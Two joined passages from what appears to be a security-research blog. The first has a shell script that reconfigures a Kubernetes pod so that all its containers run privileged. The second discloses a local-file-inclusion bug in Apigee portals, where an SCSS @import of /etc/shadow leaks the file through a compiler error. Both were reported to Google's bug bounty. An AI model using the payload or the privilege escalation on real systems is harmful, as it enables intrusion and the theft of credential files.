Most of the containers inside the Kubernetes pods run unprivileged by default. Because of this, we are unable to use debugging tools like gdb and strace inside these containers: both rely on the ptrace() syscall and require at least the SYS_PTRACE capability. Rather than granting just that capability, it is easier to run all containers in privileged mode, so I wrote a script to reconfigure the ‘cs-6000’ pod.

The script below writes a new cs-6000 manifest and links the old config to /dev/null. After running it, you will find that all containers inside the pod automatically restart. Now all containers run in privileged mode and we can start debugging.

#!/bin/sh
# wtm@offensi.com

# write new manifest
cat /etc/kubernetes/manifests/cs-6000.yaml | sed s/"    'securityContext': \!\!null 'null'"/\
"    'securityContext':\n"\
"      'privileged': \!\!bool 'true'\n"\
"      'procMount': \!\!null 'null'\n"\
"      'runAsGroup': \!\!null 'null'\n"\
"      'runAsUser': \!\!null 'null'\n"\
"      'seLinuxOptions': \!\!null 'null'\n"/g > /tmp/cs-6000.yaml

# replace old manifest with symlink
mv /tmp/cs-6000.yaml /etc/kubernetes/manifests/cs-6000.modified
ln -fs /dev/null /etc/kubernetes/manifests/cs-6000.yaml


Continue reading: Bug #1 – The Python language server

LFI in Apigee portals

Introduction

Apigee provides clients with an API management platform that enables them to design, secure, deploy, monitor, and scale APIs. Furthermore, Apigee offers a customizable developer portal that enables developers to consume APIs easily and securely, and to measure API performance and usage. Apigee was acquired by Google in 2016 and is therefore considered in scope for the Google VRP, meaning that any valid vulnerability found in the Apigee platform will be rewarded.

Creating a custom portal

In order to interact with the developer community, API providers can expose their API to the public by building a custom portal. Apigee portals are based on Drupal 7 and come with a preloaded set of options for users to customize. Users can modify the default theme, add pages and users, manage assets and publish APIs, as can be seen in the screenshot taken from the portal management interface.


When done editing, the portal manager publishes the portal on a subdomain of apigee.io. Healthapix.apigee.io shows a clear example of what the end result of a portal looks like.

Customizing the stylesheet

According to the documentation on https://docs-new.apigee.com, users can edit the style of the theme by using SCSS instead of CSS:

The style rules are defined using Sassy Cascading Style Sheet (SCSS). SCSS is a superset of Cascading Style Sheets (CSS), offering the following advantages:

  • Global variables that can be re-used throughout the style sheet.
  • Nested rules to save style sheet development time.
  • Ability to create mixins and functions

This implies that compilation and conversion take place on the server side. After compilation completes, regular CSS files are published to the portal. This process looks like something worth taking a closer look at.

The import directive

When going through the language-specific documentation on sass-lang.com, there is one directive that stands out from the rest:

CSS has an import option that lets you split your CSS into smaller, more maintainable portions. The only drawback is that each time you use @import in CSS it creates another HTTP request. Sass builds on top of the current CSS @import but instead of requiring an HTTP request, Sass will take the file that you want to import and combine it with the file you’re importing into so you can serve a single CSS file to the web browser.

In short, the import directive allows us to reference other SCSS files using this syntax: @import 'somefile'. When it sees this directive, the SASS compiler automatically tries to locate ‘somefile.scss’, ‘somefile.sass’ or ‘somefile’. Depending on the version of the compiler you are using, you might see small differences in behavior.

Exploitation

What happens if we reference an arbitrary file with @import ‘/etc/shadow’? This file does not contain valid SCSS code, so compilation will most likely fail.
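The behaviour is easy to reproduce with a local SCSS compiler; a sketch, assuming a compiler such as sassc is installed (the exact error wording differs per compiler, but the offending input is typically echoed back):

echo "@import '/etc/shadow';" > evil.scss
sassc evil.scss out.css   # compilation fails, and the error quotes the imported file's contents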


Compilation indeed fails, throwing an error that exposes the contents of /etc/shadow, a file which is only readable by the root user.

This particular bug was fixed within a matter of hours after we submitted the details to Google. Thanks to Google for running the VRP the way they do!

